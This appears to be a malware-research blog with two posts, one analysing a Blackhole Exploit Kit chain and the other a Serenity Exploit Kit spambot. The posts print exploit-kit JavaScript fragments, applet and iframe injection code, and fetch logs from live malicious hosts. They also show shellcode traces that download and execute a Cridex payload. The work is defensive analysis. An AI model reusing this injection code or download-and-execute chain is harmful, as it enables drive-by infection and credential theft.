All ↑files are mostly spam redirector but page8.htm contains malicious code: Which we decoded easily to be like this: ↑Which is showing a malicious url of BHEK pattern. Shortly, we fetched it & by the TCP/HTTP data we can be sure is a BHEK:
--21:17:54--  
h00p://203.80.16.81:8080/forum/links/column.php
Connecting to 203.80.16.81:8080... seconds 0.00, connected.
Created socket 1920.
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie is knocking on your door |-(
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 17 Nov 2012 20:40:41 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
Closed fd 1920
21:17:56 (43.56 KB/s) - `column.php' saved [31778]
The downloaded file contains a condensed Javascript as per below hexed code:
<html><head><title></title></head><body><script>try{if(window.document)window.document.body="asd"}catch(e
{var PluginDetect={version:"0.7.9",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}}
nction(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]
umRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){re
test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.i
j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){
(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeT
);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a<d.length;a++){if(c>-1&&a
if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[...
You can see full original code in our pastebin -->>[PASTEBIN] And a nice readable code can be seen here -->>[PASTEBIN] Seeing the decoded code well, we can see the PluginDetect 0.7.9 logic is used in it. The EK coder is misusing PluginDetect 0.7.9 base code for infection purpose. And since PluginDetect 0.7.9 released officially it was already used by infectors. Compares to the BHEK2 with previous PluginDetect 0.7.8, this version is using similar method, however some changes was detected as per following summary: Provided Exploits:
Msxml2.XMLHTTP
Msxml2.DOMDocument
Microsoft.XMLDOM
ShockwaveFlash.ShockwaveFlash
TDCCtl.TDCCtl
Shell.UIHelper
Scripting.Dictionary
wmplayer.ocx
Browser Access: Accepting only access from these html headers ;-))
"Win",
"Mac",
"Linux",
"FreeBSD",
"iPhone",
"iPod",
"iPad",
"Win.*CE",
"Win.*Mobile",
"Pocket\s*PC"
Strictly get version info value of browser engine versions...
d.isGecko=(/Gecko/i).test(k)&&(/Gecko\s*\/\s*\d/i).test(l);
d.verGecko=d.isGecko?d.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(l)?RegExp.$1:"0.9"):null;
d.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(l);
d.verChrome=d.isChrome?d.formatNum(RegExp.$1):null;
d.isSafari=((/Apple/i).test(j)||(!j&&!d.isChrome))&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(l);
d.verSafari=d.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(l)?d.formatNum(RegExp.$1):null;
d.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(l);
d.verOpera=d.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(l)||1)?parseFloat(RegExp.$1,10):null;
d.addWinEvent("load",d.handler(d.runWLfuncs,d))

Infector plugins:

1. Java Exploit
mimeType:"application/x-java-applet","application/x-java-vm", "application/x-java-bean"],classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"
Aimed for generic exploit affecte to below Java Versions:
[1,9,1,40]
[1,8,1,40]
[1,7,1,40]
[1,6,0,40]
[1,5,0,30]
[1,4,2,30]
[1,3,1,30]]
Also provided special handling for the specific Java version below:
k=[1,5,0,14],
j=[1,6,0,2],
h=[1,3,1,0],
g=[1,4,2,0],
f=[1,5,0,7]
2. Flash Exploit
mimeType:"application/x-shockwave-flash",progID:"ShockwaveFlash.ShockwaveFlash" ,classID:"clsid:D27CDB6E-AE6D-11CF-96B8-444553540000"
Replacing the downloaded object by this into exe in locals... return e?e[0].replace(/[rRdD\.]/g,",").replace(/\s/g,""):null 3. Adobe Reader
mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"], classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000"
Logic to check adobe version is: if(pdfver[0]>0&&pdfver[0]<8) (pdfver[0]==8||(pdfver[0]==9&&pdfver[1]<4) //Hint! [Important!] New: makeSense function We detect a new control called makeSense() function to check the PDF & Java versions, it uses the below applet code to get & pass parameter version & vendor info:
import java.applet.Applet;
public class A extends Applet
{
  public String getAppVersion()
  {
    return "3";  }

  public String getProp(String paramString)
  {
    String str = "";
    try {
      if ((paramString instanceof String)) str = System.getProperty(paramString); 
    }
    catch (Exception localException) {
    }
    return str;  }

  public String getVersion()
  {
    return getProp("java.version"); }

  public String getVendor()
  {
    return getProp("java.vendor");  }

  public void statusbar(String paramString)
  {
    try
    {
      if ((paramString instanceof String)) showStatus(paramString);
    }
    catch (Exception localException)
    {}}}
Let's go back to our case, this infection uses PluginDetect 0.7.9, So if we hit j1, j2 parameters correctly there are 2(two) jar malware downloads, as per coded below:
function j1() {
  var d=document.createElement("div");
  d.innerHTML = '<applet archive="../data/spn2.jar" code="impossibla">
  <param name="val" value="0b0909041f"/>
  <param name="prime" value="3131271c083c181c3c37343c18371f181c181c312c174421233143323a11193138174321233a3c040b043d112c39081c1f373a1f37321f37321f080802043539270e1f37111f37231f08271f08081f37111f37111f08371f37361f3717020139372c02170e392802382c390b"/></applet>';
  document.body.appendChild(d);
  return true;
}
function j2() {
  var d=document.createElement("div");
  d.innerHTML = '<applet archive="../data/spn.jar" code="impossibla">
  <param name="val" value="0b0909041f"/><
  param name="prime" value="3131271c083c181c3c37343c18371f181c181c312c174421233143323a11193138174321233a3c040b043d112c39081c1f373a1f37321f37321f080802043539270e1f37111f37231f08271f08081f37111f37111f08371f37361f3717020139370502170e392802382c390b"/></applet>';
  document.body.appendChild(d);
  return true;
}
Tracing the path and we get the jars as below:
--00:25:07--  h00p://203.80.16・81:8080/forum/data/spn.jar
           => `spn.jar'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,745 (12K) [application/java-archive]
00:25:09 (37.62 KB/s) - `spn.jar' saved [12745/12745]

--00:25:14--  h00p://203.80.16・81:8080/forum/data/spn2.jar
           => `spn2.jar'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21,607 (21K) [application/java-archive]
00:25:16 (49.66 KB/s) - `spn2.jar' saved [21607/21607]
These files are Java exploiter, There's abuse code of java.lang.String.inter CVE-2012-5076 code in "spn.jar" and - also CVE-2012-4681 & CVE-2012-1723 in "spn2.jar"; used to exploit+download payload. We will soon discussing these exploits. Some internet operation strings in both files can be viewed soon, like:
* * * File: spn.jar
import java.net.URL;
 41: invokevirtual 51 java/lang/Class:getResource (Ljava/lang/String;)Ljava/net/URL;
 44: invokevirtual 55 java/net/URL:toString ()Ljava/lang/String;
103: new     56 java/net/URL
 :
106: dup
107: aload 4
109: invokespecial 71 java/net/URL: (Ljava/lang/String;)V
 :
137: checkcast     84 java/net/URLConnection
140: astore        6
142: aload         6
144: invokevirtual 86 java/net/URLConnection:getInputStream ()Ljava/io/InputStream;

* * * File: spn2.jar
import java.net.URL;
 49: invokevirtual 232 java/lang/Class:getResource (Ljava/lang/String;)Ljava/net/URL;
 52: invokevirtual 236 java/net/URL:toString ()Ljava/lang/String;
113: new            68 java/net/URL
116: dup
117: aload 5
119: invokespecial 70 java/net/URL: (Ljava/lang/String;)V
148: checkcast    260 java/net/URLConnection
151: astore         7
153: aload          7
155: invokevirtual 262 java/net/URLConnection:getInputStream ()Ljava/io/InputStream;
Below is the Exploit CVE-2012-5076 code used in spn.jar (click to enlarge) And below is the CVE-2012-4681 used in spn2.jar to download mess.. (click to enlarge) ↑is at the public static void impossibla(impossibld paramimpossibld) and in - the public Object impossibla() As per advised by @Dr4g0nFlySm0k3, in "spn2.jar" at public class impossiblb we also detected exploit CVE-2012-1723 code as per snipped below (core code only): PS: There is a quite long list of variables for gaining “type confusion”between - static & an instance variable for this exploit, and I snipped them all at snapshot above, for more details please check download sample files provided at bottom post's link. [NEW] I was just mentioned in twitter, thanks to @PhysicalDrive0, that Java exploits always in threes, below is the message: The first response I did was re-read the PluginDetect 0.7.9, and - be 100% sure that there is no sign of spn3.jar in there, next, I checked last fetched - spider logs.. couldn't find it either. But I just tried to download it by following the path of spn.jar & spn2.jar and....
--2012-11-18 22:14:07--  h00p://203.80.16.81:8080/forum/data/spn3.jar
Connecting to 203.80.16.81:8080... connected.
Created socket 3.
---request begin---
GET /forum/data/spn3.jar HTTP/1.1
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie is knocking AGAIN on your door! |-((
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 18 Nov 2012 21:37:08 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Mon, 22 Oct 2012 13:35:13 GMT
ETag: "1350005-521e-4cca5ec4d4640"
Accept-Ranges: bytes
Content-Length: 21022
---response end---
200 OK
Registered socket 3 for persistent reuse.
Length: 21022 (21K) [application/java-archive]
Saving to: `spn3.jar'
100%[=============>]21,022      43.2K/s   in 0.5s
2012-11-18 22:14:08 (43.2 KB/s) - `spn3.jar' saved [21022/21022]
↑By God, there is a spn3.jar!! But Why? Not in PluginDetect means no chance for infection.. Here's the snapshot, ↓it showed the file's upload date...
-rw-r--r--  1 xxx xxx  21022 Oct 22 22:35 spn3.jar
MD5 (spn3.jar) = 66c55d2cebc9d2d7b09a6e12b94fc1c9
So let's see what exploit it has inside, first, in the public class fewwebwegb it has CVE-2012-0507 ↓ second, in the public class fewwebwegc it has CVE-2012-4681 exploit code↓ ↑These two exploits are double hitting the suspect's PC to break Java's privilege.. [NEW] There is also another file called "t.pdf" which is not written in PluginDetect PoC (Thank's again to Physicaldrive0 for the hint) is as below:
--01:39:46--  h00p://203.80.16.81:8080/forum/data/t.pdf
           => `t.pdf'
Connecting to 203.80.16.81:8080... seconds 0.00, connected.
Created socket 1920.
---request begin---
GET /forum/data/t.pdf HTTP/1.0
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie Now BANGING at your Door ||-((
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 19 Nov 2012 01:02:39 GMT
Content-Type: application/pdf
Connection: keep-alive
Last-Modified: Fri, 14 Sep 2012 18:03:02 GMT
ETag: "13500e4-1fa7-4c9ad3c1e8180"
Accept-Ranges: bytes
Content-Length: 8103
---response end---
200 OK
Registered socket 1920 for persistent reuse.
Length: 8,103 (7.9K) [application/pdf]
01:39:47 (78.02 KB/s) - `t.pdf' saved [8103/8103]

$ ls -alF t.*
-rwx------   1 xxx xxx   8103 Sep 14 09:03 t.pdf
$ md5 t.pdf
MD5 (t.pdf) = d1e2ff36a6c882b289d3b736d915a6cc
It is a common Pidief exploit shellcode downloader, w/invalid xref it calls obfuscated code below to be extracted as shellcode,
0000000004 00000 f
0000000772 00000 n
0000001087 00000 n
0000001137 00000 n
0000000000 00000 f
0000000000 65535 f
0000001284 00000 n
   :         :
0000035752 00000 n
0000036095 00000 n
0000000026 65535 f
0000000050 65535 f
0000000051 65535 f
This sample is having the highest detection ratio compares to other samples here:
MD5:          d1e2ff36a6c882b289d3b736d915a6cc
File size:    7.9 KB ( 8103 bytes )
File name:    t.pdf
File type:    PDF
Tags:        pdf acroform invalid-xref
Detection ratio:  22 / 43
URL: https://www.virustotal.com/file/1e9e19cc0e6c49f658f6205d19d3940698cbe22df6cdb149c8178857992473e7/analysis/
There is another p1 parameter as per coded below, to drop one more malicious PDF
function p1() {
  var d=document.createElement("div");
  d.innerHTML = "<iframe src=\"/forum/links/column.php?xrdbmuu="+x("c833f")+"&sckq="+x("laa")+"&bugeh=2v:1k:1m:32:33:1k:1k:31:1j:1o&hdulmrim="+x(pdfver.join("."))+"\"></iframe>";
  document.body.appendChild(d);   }
Decoding this PDF download URL it wasn't hard, took me 2minutes to figure the url :-) Here's the proof:
--01:28:48--  h00p://203.80.16。81:8080/forum/links/column.php?xrdbmuu=30:1n:1i:1
i:33&sckq=39:2v:2v&bugeh=2v:1k:1m:32:33:1k:1k:31:1j:1o&hdulmrim=1o:1d:1g:1d:1f
           => `column.php@xrdbmuu=30%3A1n%3A1i%3A1i%3A33&sckq=39%3A2v%3A2v&bugeh
=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&hdulmrim=1o%3A1d%3A1g%3A1d%3A1f
'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,788 (27K) [application/pdf]

01:28:50 (47.09 KB/s) - `column.php@xrdbmuu=30%3A1n%3A1i%3A1i%3A33&sckq=39%3A2v%
3A2v&bugeh=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&hdulmrim=1o%3A1d%3A1g
%3A1d%3A1f' saved [27788/27788]
And here's my note in manually decoding:
a=x("c833f");
   function x(s)
   {
     d=[];
     for(i=0;i  "30:1n:1i:1i:33"

a=x("laa");
   function x(s)
   {
     d=[];
     for(i=0;i "39:2v:2v"

pdfver="9.1.0"
mypdf=(pdfver.join("."));
a=x(mypdf);
   function x(s)
   {
     d=[];
     for(i=0;i "1o:1d:1g:1d:1f"
In the PDF file 0x3CD5 we can see this malicious code -->>[PASTEBIN] ↑We saw the strings "parseInt(app.beep(0)).toString().substring(1,2)" is used 122times :-) app.beep is a typical PDF function, the one digit integer resulted is the key. example:
x="17777".toString().substring(1,2)
document.write(x); ===> "7"
↑Using above hint, the deobfs code is--->>[PASTEBIN] There is the Exploit Code of CVE-2009-0927 here: And also an obfuscated shellcode here(see var bjsg value): The shellcode itself contains a "plain" download url: ↑It must've been a a copy paster level-work of malware retards :-) Well, the url for download payload is as per below:
h00p://203.80.16.81:8080/forum/links/column.php?vfg=30:1n:1i:1i:33&cacjp=2v:1k:1m:32:33:1k:1k:31:1j:1o&zbrybx=1h&gfh=xdoq&hsphg=edixgidl
Download Proof:
 --03:22:55--  h00p://203.80.16.81:8080/forum/links/column.php?vfg=30:1n:1i:1i:33&cacjp=2v:1k:1m:32:33:1k:1k:31:1j:1o&zbrybx=1h&gfh=xdoq&hsphg=edixgidl
Connecting to 203.80.16.81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 122,727 (120K) [application/x-msdownload]
100%[====================================>] 122,727      108.68K/s
03:22:57 (108.52 KB/s) - `column.php@vfg=....' saved [122727/122727]
The shellcode API calls (kernel32.dll & urlmon.dll) used for download is as below:
kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
kernel32.LoadLibraryA(lpFileName=urlmon)
kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://203.80.16.81:8080/forum/....., lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 
kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 
kernel32.TerminateThread(dwExitCode=0)
So we saved the payload as wpbt0.dll, and quick examined it with the below results... This malware drops the below files, before doing a self deletion:
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp.bat
C:\Documents and Settings\Administrator\Application Data\KB00695911.exe
Using CMD.EXE w/executed below command:
C:\WINDOWS\system32\cmd.exe
  |
  +->"C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp.bat" 
And the bat file will run the malware from new location:
"C:\Documents and Settings\Administrator\Application Data\KB00695911.exe" 
Explaining the below executable API traces:
Address: 0x403872 
CreateRemoteThread(hProcess: 0x78, 
lpThreadAttributes: 0x0, 
dwStackSize: 0x0, 
lpStartAddress: 0x3ced50, 
lpParameter: 0x3c0000, 
dwCreationFlags: 0x0, 
lpThreadId: 0x0)
All of the sudden we saw the below malicious processes:
0x2b0 lsass.exe
0x6ec KB00085031.exe
From the previous findings, studying every malicious act of this binary, we know is a trojan credential stealer, Cridex variant.

Samples downloads

Here is the picture of the captured payloads: We share these samples for the research/study purpose--->>[HERE]

VirusTotal detection ratio analysis

@unixfreaxjp ~/malware]$ date Sun Nov 18 04:38:25 JST 2012 column.php ( 2/44) -->09b4ceea8fd5e90eea21bc1e2c2892e4 sample.pdf (15/43) -->e2efc2bc128c7aa7643f025a68194a1e CVE-2009-0927 spn.jar ( 3/44) -->fbdf22bf32946676dcb1408208a24945 CVE-2012-5076 spn2.jar ( 3/44) -->e98cde0af1e59379e8aec2a7a813225f CVE-2012-4681 & CVE-2012-1723 wpbt0.dll ( 9/43) -->e673b7c943b7395cc9ad61a301652880 spn3.jar ( 15/43) -->66c55d2cebc9d2d7b09a6e12b94fc1c9 CVE-2012-0507 & CVE-2012-4681 t.pdf ( 22/43) -->d1e2ff36a6c882b289d3b736d915a6cc CVE-2009-2990

References of CVE Exploit used

MSFT-MMPC: A technical analysis on new Java vulnerability(CVE-2012-5076)-->[CLICK] Immunity Products: Java 0day analysis (CVE-2012-4681) -->[CLICK] EXPLOIT-DB: Adobe Acrobat/Reader Collab getIcon Universal Exploit(CVE-2009-0927)-->[CLICK] Symantec: An Examination of Java Vulnerability CVE-2012-1723 -->[CLICK] MSFT-MMPC: The rise of a new Java vulnerability - CVE-2012-1723 -->[CLICK]

Other NEW Refereces of PluginDetect BHEK 0.7.9 (The Non-Obfuscated JavaScript Version)

Sophos: Blackhole confusion. Custom builds or copycats? -->[HERE] F-Secure: Cool-er Than Blackhole? -->[HERE] Malware Don't Need Coffee: CVE-2012-5076 - Massively adopted - BHEK update to 2.0.1 -->[HERE]

[NEW!] Additional Info of PluginDetect BHEK 0.7.9 Obfuscated Version

We also detected obfuscation version of PluginDetect BHEK 0.7.9. The sources are from 2(two) spam attachment HTML files as per below pics: *) Thank's to Officer Ken Pryor (@KDPryor) for contributing the samples. The attached HTML file is having code leads to the obfuscated PluginDetect 0.7.9 Both spams is having same obfuscation code: We can decode this code to find the PluginDetect urls as below: (click to enlarge) The column.php is the obfuscation version of PluginDetect 0.7.9 It used a new pattern of deobfuscation, we decode it here-->>[PASTEBIN] ↑with the step by step text guidance on how to it. The components of BHEK2 w/obfuscated PluginDetect 0.7.9 is as usual: ↑these are the samples captured from that host (hamasutra.ru) For the research purpose, here's all sample of this infection-->>[CLICK] Furthermore hamasutra.ru is having some IPs & DNS, see --->>[PASTEBIN] in those IP it has a LONG history of BHEK in past up to 30days -->>[PASTEBIN] In case you are wondering of detection rates(CVE data is as per above list): Email attached HTML1 (21/43) fa7b41a96360c09baad5b8fa210e6fae Email attached HTML2 (11/43) 9d3ce7441ea6cffcc3aeee80238357fe infector.pdf (21/43) 2c325f278f741e8b4cfe66af87b96c40 ↑This pdf decoding guide is here -->>[PASTEBIN] spn3.jar (19/41) 66c55d2cebc9d2d7b09a6e12b94fc1c9 spn2.jar (3/43) 4ad0cb8901186409045bf2961f1cad26 spn.jar (3/41) 3eb329162cbf4f1538d7d0f1a23d391c t.pdf (21/43) d1e2ff36a6c882b289d3b736d915a6cc ..And the Obfuscated PluginDetect 0.7.9 /column.php (4/42) ba76833dc28ad027d0ad148351c9b167

#MalwareMustDie!

Saturday, November 17, 2012

What Serenity Exploit Kit dropped? A Spambot Full Analysis & Samples

We ran into the bunch of url as per hinted by ‏our friend→ @abhinavbom (with Thanks!)
accountpro001.ru/flow08.php
accountpro002.ru/flow08.php
accountpro003.ru/flow08.php
accountpro004.ru/flow08.php
accountpro005.ru/flow08.php
accountpro006.ru/flow08.php
accountpro007.ru/flow08.php
accountpro007.ru/flow4.php
accountpro008.ru/flow08.php
azbuka001.pro/flow08.php
azbuka002.pro/flow08.php
azbuka003.pro/flow08.php
azbuka004.pro/flow08.php
azbuka005.pro/flow08.php
azbuka006.pro/flow08.php
azbuka007.pro/flow08.php
azbuka008.pro/flow08.php
promoution170.ru/flow08.php
promoution208.ru/flow08.php
promoution209.ru/flow08.php
promoution210.ru/flow08.php
promoution212.ru/flow08.php
promoution213.ru/flow08.php
promoution214.ru/flow08.php
promoution215.ru/flow08.php
promoution216.ru/flow08.php
promoution219.ru/flow08.php
www.accountpro003.ru/flow08.php
www.accountpro004.ru/flow08.php
www.accountpro007.ru/flow08.php 
Which lead us to the infector urls provided by Serenity Exploit Kit, you can see the explanation of Serenity here --->>[HERE] (Thanks to @Xylit0l) We made investigation of the malware dropped by these urls as per announced in our twitter below with result in txt report here: -->>[HERE] You can see the details of investigation in the dropbox url above and we will review the important point only in this blog post. The scheme of infection is by multiple IFRAME opened by each front url, like flow08.php has about 7(seven) iframe code which meant to redirect you to infector. As per below hexed code:
<iframe src="h00p://azbuka007・pro/flow1.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow2.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow3.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow4.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow5.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow6.php" width="3" height="3" frameborder="0"></iframe>
<iframe src="h00p://azbuka007・pro/flow7.php" width="3" height="3" frameborder="0"></iframe>
↑each IFRAME above will redirect you to below infector↓
h00p://winampgroup.co.uk/k0ff/index.php?s=ag
Which conatins the obfuscated JavaScript like per hexed code below:
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN'               
<script language='Javascript'>eval(function(p,a,c,k,e,d){e=function(c..
\10\\Q\\1e\\R\\Y\\V\\17+/\\U\',J:C(8){7 5=\'\';7 x,v,y;7 w,q,f,s;7 i=0;..
t.J(u)},M:C(e){7 l=\'\';7 i=0;7 c=0,X=0,k=0,E=0;L(i<e.h){c=e.j(i);r(c<1..
oafdhMx|stxoGt|bvvjiiwja|KbGNual|GugimE|FYBSyrEvgcI|GEWtjFCOO|||str|fun..
90170177131203221200143216237189152211217178178164170167130237226190144..
51891601972371881511781951991441822281871871992131991222012311631642372..
13023722618918116517218814817021819915922423817816819016419014418222718..
02237178131203220180140197241163168237218199159224238178168190226199181..
61751562321771901682212211981811982381882011742271981812362381771672021..
16821121718015519022918516724121719919317323518613019121617612219423818..
20168188152186163176193173171185167173225189159165239187201174217200155..
11991811931771611892112211981432022421641302412271891591972381861512292..
u0056W|u0046GHIJKLMN|224|u004fPQR|u0053TU|128|u0065fghij'.split('|'),0,..
</script></body></html>
If you decode this right it will lead you to the 3(three) malware file links:
winampgroup.co.uk/files/load/combo.jar
win-amps.eu/k0ff/get.php?f=6
winampgroup.co.uk/files/load/libt.php
When I was fetching these urls, get.php?f=6 was only the one that I can fetched, (again, see the text report in the dropbox above for the details) which downloaded you a PE binary file, as per below:
$ bitcat get.php

0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
0030   00 00 00 00 00 00 00 00 00 00 00 00 F0 00 00 00    ................
0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
0080   03 6B 20 3B 47 0A 4E 68 47 0A 4E 68 47 0A 4E 68    .k ;G.NhG.NhG.Nh
0090   42 06 41 68 53 0A 4E 68 42 06 11 68 02 0A 4E 68    B.AhS.NhB..h..Nh
00A0   54 02 13 68 45 0A 4E 68 C4 02 13 68 44 0A 4E 68    T..hE.Nh...hD.Nh
00B0   47 0A 4F 68 0C 0A 4E 68 42 06 2E 68 43 0A 4E 68    G.Oh..NhB..hC.Nh
00C0   AB 01 10 68 46 0A 4E 68 42 06 14 68 46 0A 4E 68    ...hF.NhB..hF.Nh
00D0   52 69 63 68 47 0A 4E 68 00 00 00 00 00 00 00 00    RichG.Nh........
00E0   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
00F0   50 45 00 00 4C 01 04 00 6D 1C A5 50 00 00 00 00    PE..L...m..P....
0100   00 00 00 00 E0 00 0F 01 0B 01 07 0A 00 50 00 00    .............P..

PE Image Base : 0x400000
Entry Point: 0x1186
Compile Time: 0x50A51C6D [Thu Nov 15 16:46:37 2012 UTC]
CRC Fail! Claimed: 47607, Actual:  197000
Packer: Armadillo v2.xx (CopyMem II) - additional
Compiler: Microsoft Visual C++ 7.0 MFC
// ↑Traces...
// push    12010h
// push    offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
// push    esi

Sections:
   .text 0x1000 0x4da4 20480
   .rdata 0x6000 0x16de 8192
   .data 0x8000 0x1258 4096
   .rsrc 0xa000 0x1f0 4096  <==== packed
We quick checked for threat information about this file and found ourself dissapointed by seeing only unsatisfactory result:
File get.php with MD5 268bece218187c189c2322d6f7d21efb :
DrWeb                    : Trojan.Spambot.11176
Symantec                 : WS.Reputation.1
Kaspersky                : UDS:DangerousObject.Multi.Generic
So with a bit reversing skill we decided to surgery this malware file by ourself, which ended to many malicious traces below..... (again, see the text report in the dropbox above for the details)

Binary Analysis

It looks packed with Armadillo (see the comment below for this detection/judgement). Also the usage of crypter traces is detected in the binary. So, for the better analysis purpose, be sure to unpack it first. @Xylit0l is kind to provide a video for manual analysis and unpacking w/OllyDbg + PUPE below (enlarge it to see the details) After reversing some codes you'll find the dangerous operations below:
push    offset PathName ; lpFilename
push    0               ; lpModuleName
call    ds:GetModuleHandleA
push    eax             ; hModule
call    ds:GetModuleFileNameA
push    1036640h        ; dwBytes
push    0               ; dwFlags
   :
LPSTR GetCommandLineA(void)
     extrn GetCommandLineA:dword ; DATA XREF: start:loc_40128B
   :
.idata:00406038 ; BOOL __stdcall 
                 WriteFile(HANDLE hFile,LPCVOID lpBuffer,DWORD nNumberOfBytesToWrite,LPDWORD lpNumberOfBytesWritten,
                 LPOVERLAPPED lpOverlapped)
.idata:00406038  extrn WriteFile:dword   ; DATA XREF: __NMSG_WRITE+155
   :
; Microsoft VisualC 2-8/net runtime
; Attributes: library function
unknown_libname_1 proc near
arg_0= dword ptr  4
push    offset ModuleName ; "mscoree.dll"
call    ds:GetModuleHandleA
test    eax, eax
jz      short loc_401380
It was enough to tell us that it writes file, it executes foreign code, and it shows serious internet activities.

Behavior analysis

The next step is to test it, we did it as per below steps.. We just run it... The sample was self deleted saved into different location + it runs evil SVCHOST: Well let's see what this SVCHOST does, by monitoring its activity. Windows task manager provided enough facilities for this purpose: ↑you can see so many SMTP connections made by this binary. Then what exactly these SMTP connection does? What malicious act? We captured everything with reghot, wireshark & memory dump inside the testPC, outside the box w/tcpdump to study this malware malicious acts.

What's the malware's malicious file operation?

Malware file is self deleted & move itself to here:
C:\Documents and Settings\rik\jjsrdpce.exe
Drops some temp files here:
C:\DOCUME~1\...\LOCALS~1\Temp\0706.bat
C:\DOCUME~1\...\LOCALS~1\Temp\3366.bat
C:\DOCUME~1\...\LOCALS~1\Temp\8160.bat
C:\DOCUME~1\...\LOCALS~1\Temp\6783.bat
C:\DOCUME~1\...\LOCALS~1\Temp\7686.bat
C:\DOCUME~1\...\LOCALS~1\Temp\1438.bat

What this binary had done in registry?

A malware autorun component registered as per below:
HKU\S-1-5-21-1214440339-926492609-1644491937-1003\
Software\Microsoft\Windows\CurrentVersion\Run\MSConfig: 
""C:\Documents and Settings\rik\jjsrdpce.exe""
A huge ASCII binary data was saved in registry at below record...
HKLM\SOFTWARE\Microsoft\DeviceControl\DevData: C3 6A 05 ..
 74 D9 4E 39 85 63 D5 B1 2A 97 64 D7 89 25 BF 5B F5 91 2..
12 EB 03 9D 39 E2 57 31 8B 0E ED 40 3F 9A 74 D3 53 26 8B..
3 EF 89 25 BF EC 9C 91 2B C7 13 9A E3 41 B4 01 61 F8 5D ..
 75 11 AB 47 E1 7D 17 B3 4D 52 82 1F B9 05 01 80 25 E4 7..
FD E4 41 BB 36 77 F6 54 B0 6F 26 94 76 ED 46 27 9B 7E D7..
